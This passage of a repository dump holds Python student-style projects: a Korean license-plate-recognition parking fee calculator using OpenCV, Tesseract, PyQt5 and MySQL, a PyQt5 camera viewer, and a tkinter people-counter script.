입차 데이터 DB에 저장\n conn = pymysql.connect(host=\"localhost\",user=\"root\",password=\"1234\",db=\"mydb1\",charset=\"utf8\")\n\n\n try:\n mydb = conn.cursor()\n sql = \"insert into carlist(car_number, intime) values(%s, now())\"\n mydb.execute(sql, carnumb)\n conn.commit()\n\n finally:\n conn.close() \n\n def update_db(self,_time,_price, carnumb): # 출차데이터 DB에 업데이트\n conn = pymysql.connect(host=\"localhost\",user=\"root\",password=\"1234\",db=\"mydb1\",charset=\"utf8\")\n try:\n mydb = conn.cursor()\n sql =\"update carlist set outtime=now(), parkingTime=%s, parkingPrice=%s where car_number=%s and outtime is null\"\n vals = (_time, _price, carnumb)\n mydb.execute(sql, vals )\n conn.commit()\n finally:\n conn.close()\n\n def onStartButtonClicked(self): # 입차한 차 번호판 인식 및 입차시간 저장\n #비디오를 이미지로 캡쳐한다.\n self.thread.bSaveFlag = True\n #WAit0.5\n sleep(0.5)\n #self.thread.save()\n startTime = datetime.now()\n str_stTime = str(startTime)\n self.lblTime.setText(\"입차 시각: \" + str_stTime)\n carTime.append(startTime) # 주차등록 시간 배열에 추가\n \n #image_ori=cv2.imread(\"./frame.jpg\", cv2.IMREAD_UNCHANGED)\n img_ori = cv2.imread('./frame.jpg',cv2.IMREAD_UNCHANGED)\n#img_ori = cv2.imread('C:/KoreaAI/Image/testimg3.jpg')\n height, width, channel = img_ori.shape \n# ## 원본 사진을 그레이 색상으로 바꾼다.\n gray = cv2.cvtColor(img_ori, cv2.COLOR_BGR2GRAY)\n\n # 노이즈를 줄이기위해 가우시안 블러를 사용\n # blurring이란 이미지의 고주파 부분을 조금 더 자연스럽게 바꾸어줄 수 있는 방법이다.\n img_blurred = cv2.GaussianBlur(gray, ksize=(5, 5), sigmaX=0)\n\n # 이미지의 Threshold를 적용하여 검은색과 흰색으로 이진화 
한다.\n img_thresh = cv2.adaptiveThreshold(\n img_blurred,\n maxValue=255.0,\n adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n thresholdType=cv2.THRESH_BINARY_INV,\n blockSize=19,\n C=9\n )\n # ## 컨투어(contour)란 동일한 색 또는 동일한 픽셀값(강도,intensity)을 가지고 있는 영역의 경계선 정보, 물체의 윤곽선, 외형을 파악하는데 사용된다\n #\n # 흑백 이미지에서 컨투어(윤곽선)을 찾는다.\n contours, _ = cv2.findContours(\n img_thresh, mode=cv2.RETR_LIST, method=cv2.CHAIN_APPROX_SIMPLE)\n \n # Bounding Rectangle은 컨투어 라인을 둘러싸는 사각형을 그리는 방법이다. \n\n # 빈 이미지를 검은색으로 만든다.\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n # 리스트를 만들고\n contours_dict = []\n # 컨투어의 사각형 범위를 찾아서 검은 비어있는 이미지에 사각형을 그린다.\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n\n cv2.rectangle(temp_result, pt1=(x, y), pt2=(x+w, y+h),\n color=(255, 255, 255), thickness=2)\n\n # insert to dict\n contours_dict.append({\n 'contour': contour,\n 'x': x,\n 'y': y,\n 'w': w,\n 'h': h,\n 'cx': x + (w / 2),\n 'cy': y + (h / 2)\n })\n\n # 컨투어를 감싸는 사각형들만 나온다\n\n # 번호판 크기 상수 지정\n MIN_AREA = 80\n MIN_WIDTH, MIN_HEIGHT = 2, 8\n MIN_RATIO, MAX_RATIO = 0.25, 1.0\n\n # 가능한 컨투어들을 저장해 놓는곳\n possible_contours = []\n\n cnt = 0\n for d in contours_dict:\n area = d['w'] * d['h'] # 면적=가로*세로\n ratio = d['w'] / d['h'] # 배율=가로/세로\n # 번호판일 확률이 높은 컨투어들을 저장\n if area > MIN_AREA and d['w'] > MIN_WIDTH and d['h'] > MIN_HEIGHT and MIN_RATIO < ratio < MAX_RATIO:\n d['idx'] = cnt\n cnt += 1\n possible_contours.append(d)\n\n # 비어있는 이미지 파일을 만들고\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 가능한 컨투어 사각형만을 그린다.\n for d in possible_contours:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n MAX_DIAG_MULTIPLYER = 5 # 컨투어 사이의 길이가 5배 안에 있어야 한다.\n MAX_ANGLE_DIFF = 12.0 # 첫번째 컨투어와 두번째 컨투어 중심사이의 대각선 최대값\n MAX_AREA_DIFF = 0.5 #\n MAX_WIDTH_DIFF = 0.8\n MAX_HEIGHT_DIFF = 0.2\n MIN_N_MATCHED = 3 # 3개 이상이 되어야 번호판이다.\n\n # 찾는 함수\n def find_chars(contour_list):\n matched_result_idx = []\n\n # d1 컨투어와 d2 컨투어를 비교하여 체크\n for d1 in contour_list:\n matched_contours_idx = []\n for d2 in contour_list:\n if d1['idx'] == d2['idx']:\n continue\n\n dx = abs(d1['cx'] - d2['cx'])\n dy = abs(d1['cy'] - d2['cy'])\n diagonal_length1 = np.sqrt(d1['w'] ** 2 + d1['h'] ** 2)\n\n # 컨투어 사이의 거리 구한다\n distance = np.linalg.norm(\n np.array([d1['cx'], d1['cy']]) - np.array([d2['cx'], d2['cy']]))\n if dx == 0:\n angle_diff = 90\n else:\n angle_diff = np.degrees(np.arctan(dy / dx))\n\n area_diff = abs(d1['w'] * d1['h'] - d2['w'] *\n d2['h']) / (d1['w'] * d1['h'])\n width_diff = abs(d1['w'] - d2['w']) / d1['w']\n height_diff = abs(d1['h'] - d2['h']) / d1['h']\n\n if distance < diagonal_length1 * MAX_DIAG_MULTIPLYER and angle_diff < MAX_ANGLE_DIFF and area_diff < MAX_AREA_DIFF and width_diff < MAX_WIDTH_DIFF and height_diff < MAX_HEIGHT_DIFF:\n matched_contours_idx.append(d2['idx'])\n\n # append this contour\n matched_contours_idx.append(d1['idx'])\n\n # 후보군의 갯수가 3보다 작다면 제외\n if len(matched_contours_idx) < MIN_N_MATCHED:\n continue\n\n # 최종 후보군에 추가한다.\n matched_result_idx.append(matched_contours_idx)\n\n unmatched_contour_idx = []\n for d4 in contour_list:\n if d4['idx'] not in matched_contours_idx:\n unmatched_contour_idx.append(d4['idx'])\n\n unmatched_contour = np.take(possible_contours, unmatched_contour_idx)\n\n # 재귀함수 recursive하게 또 돌린다.\n recursive_contour_list = find_chars(unmatched_contour)\n\n for idx in recursive_contour_list:\n matched_result_idx.append(idx)\n\n 
break\n\n return matched_result_idx\n\n\n result_idx = find_chars(possible_contours)\n\n matched_result = []\n for idx_list in result_idx:\n matched_result.append(np.take(possible_contours, idx_list))\n\n # visualize possible contours\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n for r in matched_result:\n for d in r:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n\n PLATE_WIDTH_PADDING = 1.3 # 1.3\n PLATE_HEIGHT_PADDING = 1.5 # 1.5\n MIN_PLATE_RATIO = 3\n MAX_PLATE_RATIO = 10\n\n plate_imgs = []\n plate_infos = []\n\n \n # sort each final result group and compute its center x, y\n for i, matched_chars in enumerate(matched_result): \n sorted_chars = sorted(matched_chars, key=lambda x: x['cx']) # sort the jumbled contours by x\n\n plate_cx = (sorted_chars[0]['cx'] + sorted_chars[-1]['cx']) / 2 # center x between the first and last contour\n plate_cy = (sorted_chars[0]['cy'] + sorted_chars[-1]['cy']) / 2 # center y likewise \n\n plate_width = (sorted_chars[-1]['x'] + sorted_chars[-1] # average length\n ['w'] - sorted_chars[0]['x']) * PLATE_WIDTH_PADDING\n\n sum_height = 0\n for d in sorted_chars:\n sum_height += d['h']\n\n plate_height = int(sum_height / len(sorted_chars) * PLATE_HEIGHT_PADDING) # average height\n\n triangle_height = sorted_chars[-1]['cy'] - sorted_chars[0]['cy'] # center height of the tilted plate\n triangle_hypotenus = np.linalg.norm( # diagonal length of the tilted plate\n np.array([sorted_chars[0]['cx'], sorted_chars[0]['cy']]) -\n np.array([sorted_chars[-1]['cx'], sorted_chars[-1]['cy']])\n )\n\n # compute the angle\n angle = np.degrees(np.arcsin(triangle_height / triangle_hypotenus)) # arcsin(height / diagonal) gives theta\n\n # cv2.getRotationMatrix2D((center x, center y), angle, scale) rotation\n rotation_matrix = cv2.getRotationMatrix2D(\n center=(plate_cx, plate_cy), angle=angle, scale=1.0)\n\n # reposition the image\n img_rotated = cv2.warpAffine(\n img_thresh, M=rotation_matrix, dsize=(width, height))\n\n # crop only the plate region\n \n img_cropped = cv2.getRectSubPix(img_rotated, patchSize=(int(plate_width), int(plate_height)), center=(int(plate_cx), int(plate_cy)))\n \n if img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO or img_cropped.shape[1] / img_cropped.shape[0] > MAX_PLATE_RATIO:\n continue\n\n plate_imgs.append(img_cropped)\n plate_infos.append({\n 'x': int(plate_cx - plate_width / 2),\n 'y': int(plate_cy - plate_height / 2),\n 'w': int(plate_width),\n 'h': int(plate_height)\n })\n\n plate_chars = []\n longest_idx, longest_text = -1, 0\n \n img_result = img_cropped\n #cv2.imwrite('C:/KoreaAI/Image/t1-er_plate.jpg', img_result)\n\n chars = pytesseract.image_to_string(img_result, lang='kor', config='--psm 7')\n\n result_chars1 = ''\n has_digit = False\n for c in chars:\n if ord('가') <= ord(c) <= ord('힣') or c.isdigit():\n if c.isdigit():\n has_digit = True\n result_chars1 += c\n\n print(result_chars1)\n isStored = False\n for num in carList:\n if num ==result_chars1:\n QMessageBox.information(self,\"경고\",\"이미 주차된 번호 입니다.\")\n isStored = True\n break # plate already registered\n\n if isStored == False:\n carList.append(result_chars1)\n self.lblCar.setText(\"차량 번호: \" + result_chars1)\n self.insert_db(result_chars1)\n else:\n carTime.pop() # the entry time was appended before this duplicate check; drop it so carList and carTime stay index-aligned\n \n \n \n\n self.lblTime2.setText(\"출차 시각: \")\n self.lbParkingTime.setText(\"주차 기간: \")\n self.lbParkingPrice.setText(\"주차 요금: \")\n \n \n\n\n def onEndButtonClicked(self): # recognize the exiting car's plate and store its time and fee\n # capture the video to an image\n self.thread.bSaveFlag = True\n # wait 0.5 s\n sleep(0.5)\n #self.thread.save()\n\n EndTime = 
datetime.now()\n str_stTime = str(EndTime)\n self.lblTime2.setText(\"출차 시각: \" + str_stTime)\n # 주차등록 시간 배열에 추가\n \n\n #image_ori=cv2.imread(\"./frame.jpg\", cv2.IMREAD_UNCHANGED)\n img_ori = cv2.imread('./frame.jpg',cv2.IMREAD_UNCHANGED)\n#img_ori = cv2.imread('C:/KoreaAI/Image/testimg3.jpg')\n\n height, width, channel = img_ori.shape \n\n# ## 원본 사진을 그레이 색상으로 바꾼다.\n gray = cv2.cvtColor(img_ori, cv2.COLOR_BGR2GRAY)\n\n # 노이즈를 줄이기위해 가우시안 블러를 사용\n # blurring이란 이미지의 고주파 부분을 조금 더 자연스럽게 바꾸어줄 수 있는 방법이다.\n img_blurred = cv2.GaussianBlur(gray, ksize=(5, 5), sigmaX=0)\n\n # 이미지의 Threshold를 적용하여 검은색과 흰색으로 이진화 한다.\n img_thresh = cv2.adaptiveThreshold(\n img_blurred,\n maxValue=255.0,\n adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n thresholdType=cv2.THRESH_BINARY_INV,\n blockSize=19,\n C=9\n )\n\n # ## 컨투어(contour)란 동일한 색 또는 동일한 픽셀값(강도,intensity)을 가지고 있는 영역의 경계선 정보, 물체의 윤곽선, 외형을 파악하는데 사용된다\n #\n # 흑백 이미지에서 컨투어(윤곽선)을 찾는다.\n contours, _ = cv2.findContours(\n img_thresh, mode=cv2.RETR_LIST, method=cv2.CHAIN_APPROX_SIMPLE)\n\n # 빈 이미지를 만들고\n #temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 빈 이미지에 전체 컨투어를 그린다.\n #cv2.drawContours(temp_result, contours=contours,\n # contourIdx=-1, color=(255, 255, 255))\n\n # Bounding Rectangle은 컨투어 라인을 둘러싸는 사각형을 그리는 방법이다. \n\n # 빈 이미지를 검은색으로 만든다.\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 리스트를 만들고\n contours_dict = []\n\n # 컨투어의 사각형 범위를 찾아서 검은 비어있는 이미지에 사각형을 그린다.\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n\n cv2.rectangle(temp_result, pt1=(x, y), pt2=(x+w, y+h),\n color=(255, 255, 255), thickness=2)\n\n # insert to dict\n contours_dict.append({\n 'contour': contour,\n 'x': x,\n 'y': y,\n 'w': w,\n 'h': h,\n 'cx': x + (w / 2),\n 'cy': y + (h / 2)\n })\n\n # 컨투어를 감싸는 사각형들만 나온다\n\n # 번호판 크기 상수 지정\n MIN_AREA = 80\n MIN_WIDTH, MIN_HEIGHT = 2, 8\n MIN_RATIO, MAX_RATIO = 0.25, 1.0\n\n # 가능한 컨투어들을 저장해 놓는곳\n possible_contours = []\n\n cnt = 0\n for d in contours_dict:\n area = d['w'] * d['h'] # 면적=가로*세로\n ratio = d['w'] / d['h'] # 배율=가로/세로\n # 번호판일 확률이 높은 컨투어들을 저장\n if area > MIN_AREA and d['w'] > MIN_WIDTH and d['h'] > MIN_HEIGHT and MIN_RATIO < ratio < MAX_RATIO:\n d['idx'] = cnt\n cnt += 1\n possible_contours.append(d)\n\n # 비어있는 이미지 파일을 만들고\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 가능한 컨투어 사각형만을 그린다.\n for d in possible_contours:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n MAX_DIAG_MULTIPLYER = 5 # 컨투어 사이의 길이가 5배 안에 있어야 한다.\n MAX_ANGLE_DIFF = 12.0 # 첫번째 컨투어와 두번째 컨투어 중심사이의 대각선 최대값\n MAX_AREA_DIFF = 0.5 #\n MAX_WIDTH_DIFF = 0.8\n MAX_HEIGHT_DIFF = 0.2\n MIN_N_MATCHED = 3 # 3개 이상이 되어야 번호판이다.\n\n # 찾는 함수\n def find_chars(contour_list):\n matched_result_idx = []\n\n # d1 컨투어와 d2 컨투어를 비교하여 체크\n for d1 in contour_list:\n matched_contours_idx = []\n for d2 in contour_list:\n if d1['idx'] == d2['idx']:\n continue\n\n dx = abs(d1['cx'] - d2['cx'])\n dy = abs(d1['cy'] - d2['cy'])\n diagonal_length1 = np.sqrt(d1['w'] ** 2 + d1['h'] ** 2)\n\n # 컨투어 사이의 거리 구한다\n distance = np.linalg.norm(\n np.array([d1['cx'], d1['cy']]) - np.array([d2['cx'], d2['cy']]))\n if dx == 0:\n angle_diff = 90\n else:\n angle_diff = np.degrees(np.arctan(dy / dx))\n\n area_diff = abs(d1['w'] * d1['h'] - d2['w'] *\n d2['h']) / (d1['w'] * d1['h'])\n width_diff = abs(d1['w'] - d2['w']) / d1['w']\n height_diff = abs(d1['h'] - d2['h']) / d1['h']\n\n if 
distance < diagonal_length1 * MAX_DIAG_MULTIPLYER and angle_diff < MAX_ANGLE_DIFF and area_diff < MAX_AREA_DIFF and width_diff < MAX_WIDTH_DIFF and height_diff < MAX_HEIGHT_DIFF:\n matched_contours_idx.append(d2['idx'])\n\n # append this contour\n matched_contours_idx.append(d1['idx'])\n\n # exclude groups with fewer than 3 candidates\n if len(matched_contours_idx) < MIN_N_MATCHED:\n continue\n\n # add to the final candidate list\n matched_result_idx.append(matched_contours_idx)\n\n unmatched_contour_idx = []\n for d4 in contour_list:\n if d4['idx'] not in matched_contours_idx:\n unmatched_contour_idx.append(d4['idx'])\n\n unmatched_contour = np.take(possible_contours, unmatched_contour_idx)\n\n # run find_chars recursively on the leftovers\n recursive_contour_list = find_chars(unmatched_contour)\n\n for idx in recursive_contour_list:\n matched_result_idx.append(idx)\n\n break\n\n return matched_result_idx\n\n\n result_idx = find_chars(possible_contours)\n\n matched_result = []\n for idx_list in result_idx:\n matched_result.append(np.take(possible_contours, idx_list))\n\n # visualize possible contours\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n for r in matched_result:\n for d in r:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n\n PLATE_WIDTH_PADDING = 1.3 # 1.3\n PLATE_HEIGHT_PADDING = 1.5 # 1.5\n MIN_PLATE_RATIO = 3\n MAX_PLATE_RATIO = 10\n\n plate_imgs = []\n plate_infos = []\n\n # sort each final result group and compute its center x, y\n for i, matched_chars in enumerate(matched_result): \n sorted_chars = sorted(matched_chars, key=lambda x: x['cx']) # sort the jumbled contours by x\n\n plate_cx = (sorted_chars[0]['cx'] + sorted_chars[-1]['cx']) / 2 # center x between the first and last contour\n plate_cy = (sorted_chars[0]['cy'] + sorted_chars[-1]['cy']) / 2 # center y likewise \n\n plate_width = (sorted_chars[-1]['x'] + sorted_chars[-1] # average length\n ['w'] - sorted_chars[0]['x']) * PLATE_WIDTH_PADDING\n\n sum_height = 0\n for d in sorted_chars:\n sum_height += d['h']\n\n plate_height = int(sum_height / len(sorted_chars) * PLATE_HEIGHT_PADDING) # average height\n\n triangle_height = sorted_chars[-1]['cy'] - sorted_chars[0]['cy'] # center height of the tilted plate\n triangle_hypotenus = np.linalg.norm( # diagonal length of the tilted plate\n np.array([sorted_chars[0]['cx'], sorted_chars[0]['cy']]) -\n np.array([sorted_chars[-1]['cx'], sorted_chars[-1]['cy']])\n )\n\n # compute the angle\n angle = np.degrees(np.arcsin(triangle_height / triangle_hypotenus)) # arcsin(height / diagonal) gives theta\n\n # cv2.getRotationMatrix2D((center x, center y), angle, scale) rotation\n rotation_matrix = cv2.getRotationMatrix2D(\n center=(plate_cx, plate_cy), angle=angle, scale=1.0)\n\n # reposition the image\n img_rotated = cv2.warpAffine(\n img_thresh, M=rotation_matrix, dsize=(width, height))\n\n # crop only the plate region\n img_cropped = cv2.getRectSubPix(img_rotated, patchSize=(\n int(plate_width), int(plate_height)), center=(int(plate_cx), int(plate_cy)))\n\n if img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO or img_cropped.shape[1] / img_cropped.shape[0] > MAX_PLATE_RATIO:\n continue\n\n plate_imgs.append(img_cropped)\n plate_infos.append({\n 'x': int(plate_cx - plate_width / 2),\n 'y': int(plate_cy - plate_height / 2),\n 'w': int(plate_width),\n 'h': int(plate_height)\n })\n\n plate_chars = []\n longest_idx, longest_text = -1, 0\n\n img_result = img_cropped\n \n #cv2.imwrite('C:/KoreaAI/Image/t1-er_plate.jpg', img_result)\n \n chars = pytesseract.image_to_string(img_result, lang='kor', config='--psm 
7')\n\n result_chars = ''\n has_digit = False\n for c in chars:\n if ord('가') <= ord(c) <= ord('힣') or c.isdigit():\n if c.isdigit():\n has_digit = True\n result_chars += c\n \n print(result_chars)\n self.lblCar.setText(\"차량 번호: \" + result_chars)\n try:\n carindex = carList.index(result_chars)\n print(carindex)\n except ValueError:\n print(\"wwwww\")\n\n try:\n if (carList[carindex]==result_chars):\n extime = (EndTime-carTime[carindex]).seconds\n print(extime)\n str_exTime = str(extime)\n self.lbParkingTime.setText(\"주차 기간: \"+str_exTime+ \" 초\")\n price = (extime/10)*2000000\n #final_price = round(price)\n str_Price = str(price)\n self.lbParkingPrice.setText(\"주차 요금: \"+str_Price+ \" 원\")\n carList.remove(carList[carindex]) # 출차된 번호판 삭제\n carTime.remove(carTime[carindex]) # 출차된 차량 시간 삭제\n\n self.update_db(str_exTime,str_Price, result_chars) \n \n except UnboundLocalError:\n QMessageBox.information(self,\"경고\",\"없는 주차번호 입니다.\")\n print(\"번호가 없습니다.\")\n \n\n \n \n\n def closeEvent(self, event): # 창을 종료하면 쓰레드가 멈춰 stop()에 false 값을 보냄\n self.thread.stop()\n event.accept()\n @pyqtSlot(np.ndarray)\n def update_image(self, cv_img): # 이미지를 화면에 나타냄\n \"\"\"Updates the image_label with a new opencv image\"\"\"\n qt_img = self.convert_cv_qt(cv_img)\n self.image_label.setPixmap(qt_img)\n \n def convert_cv_qt(self, cv_img): # cv로 읽어온 이미지를 Qt이미지로 변환 \n \"\"\"Convert from an opencv image to QPixmap\"\"\"\n rgb_image = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n h, w, ch = rgb_image.shape\n bytes_per_line = ch * w\n convert_to_Qt_format = QtGui.QImage(rgb_image.data, w, h, bytes_per_line, QtGui.QImage.Format_RGB888)\n p = convert_to_Qt_format.scaled(640, 480, Qt.KeepAspectRatio)\n return QPixmap.fromImage(p)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = MyWindow()\n myWindow.show()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5925397276878357, "alphanum_fraction": 0.6131267547607422, "avg_line_length": 26.863636016845703, "blob_id": "f85a7ba1fbdf6b7b9366e273d428b861d83ba435", "content_id": "244887de27edb04991355bf9597158cb4e150778", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5114, "license_type": "no_license", "max_line_length": 83, "num_lines": 176, "path": "/sss.py", "repo_name": "ahlqldntm8/Parking-Calculator", "src_encoding": "UTF-8", "text": "import cv2\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QVBoxLayout, QPushButton\nfrom PyQt5.QtCore import Qt ,QRect\nfrom PyQt5.QtGui import QPainter, QPen, QColor, QBrush, QFont\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pytesseract\nimport datetime\n\n\nclass ShowVideo(QtCore.QObject):\n\n flag = 0\n\n camera = cv2.VideoCapture(0)\n \n ret, image = camera.read()\n \n\n height, width = image.shape[:2]\n \n VideoSignal1 = QtCore.pyqtSignal(QtGui.QImage)\n \n\n def __init__(self, parent=None):\n super(ShowVideo, self).__init__(parent)\n\n @QtCore.pyqtSlot()\n def startVideo(self):\n global image\n\n run_video = True\n while run_video:\n ret, image = self.camera.read()\n color_swapped_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n qt_image1 = QtGui.QImage(color_swapped_image.data,\n self.width,\n self.height,\n color_swapped_image.strides[0],\n QtGui.QImage.Format_RGB888)\n self.VideoSignal1.emit(qt_image1)\n\n\n if self.flag:\n img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n\n \n\n \n\n\n loop = QtCore.QEventLoop()\n 
QtCore.QTimer.singleShot(25, loop.quit) #25 ms\n loop.exec_()\n\n \n\nclass ImageViewer(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super(ImageViewer, self).__init__(parent)\n self.image = QtGui.QImage()\n self.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.drawImage(0, 0, self.image)\n self.image = QtGui.QImage()\n\n def initUI(self):\n self.setWindowTitle('Test')\n\n @QtCore.pyqtSlot(QtGui.QImage)\n def setImage(self, image):\n if image.isNull():\n print(\"Viewer Dropped frame!\")\n\n self.image = image\n if image.size() != self.size():\n self.setFixedSize(image.size())\n self.update()\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv) # 앱 객체 생성\n\n thread = QtCore.QThread()\n thread.start()\n vid = ShowVideo()\n vid.moveToThread(thread)\n\n image_viewer1 = ImageViewer()\n #image_viewer2 = ImageViewer()\n\n vid.VideoSignal1.connect(image_viewer1.setImage)\n #vid.VideoSignal2.connect(image_viewer2.setImage)\n \n #push_button1 = QtWidgets.QPushButton('Start')\n #push_button2 = QtWidgets.QPushButton('Canny')\n #push_button1.clicked.connect(vid.startVideo)\n #push_button2.clicked.connect(vid.canny)\n\n push_button2 = QtWidgets.QPushButton('등록')\n push_button3 = QtWidgets.QPushButton('정산')\n push_button4 = QtWidgets.QPushButton('등록된 차량메뉴')\n\n label1 = QLabel('차량번호 주차요금')\n label1.setAlignment(Qt.AlignCenter)\n font1 = label1.font()\n font1.setPointSize(10)\n label1.setFont(font1)\n\n label2 = QLabel('주차요금 표')\n label2.setAlignment(Qt.AlignCenter)\n font2 = label2.font()\n font2.setPointSize(20)\n label2.setFont(font2)\n\n label3 = QLabel('시간당 : 200만원')\n label3.setAlignment(Qt.AlignCenter)\n font3 = label3.font()\n font3.setPointSize(50)\n \n label3.setFont(font3)\n\n\n#------------------------------------------------------------\n\n vertical_layout1 = QtWidgets.QVBoxLayout()\n vertical_layout2 = QtWidgets.QVBoxLayout()\n\n button_layout = QtWidgets.QHBoxLayout()\n\n horizontal_layout = QtWidgets.QHBoxLayout()\n #horizontal_layout.addWidget(image_viewer2)\n\n\n vertical_layout1.addWidget(image_viewer1) # 캠화면\n \n #vertical_layout1.addWidget(push_button1) # 버튼\n vertical_layout1.addWidget(label1) # 텍스트 \n #vertical_layout.addWidget(push_button2)\n#------------------------------------------------------좌측 반쪽 화면\n\n\n\n\n vertical_layout2.addWidget(label2) # 주차요금 텍스트\n vertical_layout2.addStretch(1)\n vertical_layout2.addWidget(label3) # 주차요금표\n\n button_layout.addWidget(push_button2) #등록 버튼\n button_layout.addWidget(push_button3) # 정산 버튼 --- 수평 합체\n vertical_layout2.addStretch(2)\n vertical_layout2.addLayout(button_layout) # 수평합체한 버튼 \n vertical_layout2.addWidget(push_button4) # 등록됭 차량 메뉴\n vertical_layout2.addStretch(1)\n#-------------------------------------------------------우측 반쪽 화면\n\n\n\n horizontal_layout.addLayout(vertical_layout1)\n horizontal_layout.addLayout(vertical_layout2) # 좌측화면 우측화면 수평 합체\n layout_widget = QtWidgets.QWidget()\n layout_widget.setLayout(horizontal_layout)\n layout_widget.show()\n main_window = QtWidgets.QMainWindow()\n main_window.setCentralWidget(layout_widget)\n main_window.show()\n vid.startVideo()\n sys.exit(app.exec_())\n \n" } ]
3
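For reference, the settlement math in Parking_pee_Calculater.py above: the parked duration is (EndTime - entry).seconds and the fee is (seconds / 10) * 2000000 KRW — the demo tariff of 2,000,000 KRW per 10 seconds shown in the GUI. A minimal sketch of that computation together with dictionary-based bookkeeping, which avoids the parallel-list alignment that the index lookup in onEndButtonClicked depends on — the class and names are illustrative, not from the repo:

from datetime import datetime

RATE_PER_10S = 2000000  # KRW per 10 seconds, the demo tariff

class ParkingRegistry:
    def __init__(self):
        self.entries = {}  # plate -> entry time; one mapping instead of two parallel lists

    def register(self, plate):
        if plate in self.entries:
            raise ValueError("already parked")
        self.entries[plate] = datetime.now()

    def settle(self, plate):
        seconds = (datetime.now() - self.entries.pop(plate)).seconds
        return (seconds / 10) * RATE_PER_10S  # same formula as onEndButtonClicked

registry = ParkingRegistry()
registry.register("12가3456")
# ... later, at the exit gate ...
print(registry.settle("12가3456"))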
nagano28/count_py
https://github.com/nagano28/count_py
8118570c0c0a45dbc34c4f93fa41e91b462429fc
b4ccb26f0e18550d90dc81d733bc04c475afac01
e8e58b7dd7fcd89c9aaffffc49c7dad4818a3baa
refs/heads/master
2020-05-04T14:45:30.042697
2019-04-03T05:06:15
2019-04-03T05:06:15
179,209,523
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5949177742004395, "alphanum_fraction": 0.6195814609527588, "avg_line_length": 20.253969192504883, "blob_id": "b72583df9d9437595395cab7f29527447b4689b4", "content_id": "260f96a6d94901f4cd11382f569cd3536c1f64f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1372, "license_type": "no_license", "max_line_length": 109, "num_lines": 63, "path": "/countNumber.py", "repo_name": "nagano28/count_py", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 24 13:17:44 2018\n\n@author: nagano\n\"\"\"\n\nimport tkinter as tk\nfrom datetime import datetime\nimport numpy as np\nimport sys\n\nroot = tk.Tk()\nroot.title(\"number count\")\nroot.geometry(\"150x100\")\nnumber = 0\n\ndef save():\n global number\n file = open('saveNumber.txt', 'w') #書き込みモードでオープン\n file.write(\"人数 : \"+str(number)+\" Time : \" + str(datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")))\n\ndef end():\n sys.exit()\n\n\n\ndef button_bushed():\n global number\n \n if selection.get() == -1:\n number += -1\n elif selection.get() == 1:\n number += 1\n \n print (\"number of people : %d 人__________時間 : %s\" %(number,datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")))\n\n\n\nselection = tk.IntVar()\ntk.Radiobutton( root, text=\"+1\", variable=selection, value= 1 ).pack()\ntk.Radiobutton( root, text=\"-1\", variable=selection, value= -1 ).pack()\n\ntk.Button(root, text='push!', command=button_bushed).pack(side=\"right\")\ntk.Button(root,text=\"save\",bg=\"gray\",command=save).pack(side=\"left\")\n\ntk.Button(root,text=\"exit\",bg=\"gray\",command=end).pack(side=\"left\")\n\n\nroot.mainloop()\n\n\n\"\"\"slide bar\ndef button_bushed():\n print s.get()\n\ntk.Button(root, text='push!', command=button_bushed).pack()\ns = tk.Scale(root , from_=0, to=100, orient=\"h\" )\ns.pack()\n\nroot.mainloop()\n\"\"\"" } ]
1
carloserodriguez2000/HappyNumbers
https://github.com/carloserodriguez2000/HappyNumbers
ce4dd96dac87b0997f013d5e04ad92ce3923dc7f
24ab005ee6d64521d058d555c64ca0fbc1d4142e
d6b2f3b7bc0f32db4e8c939bd1914fb49ccea017
refs/heads/master
2021-01-01T05:13:46.006832
2016-05-18T00:02:00
2016-05-18T00:02:00
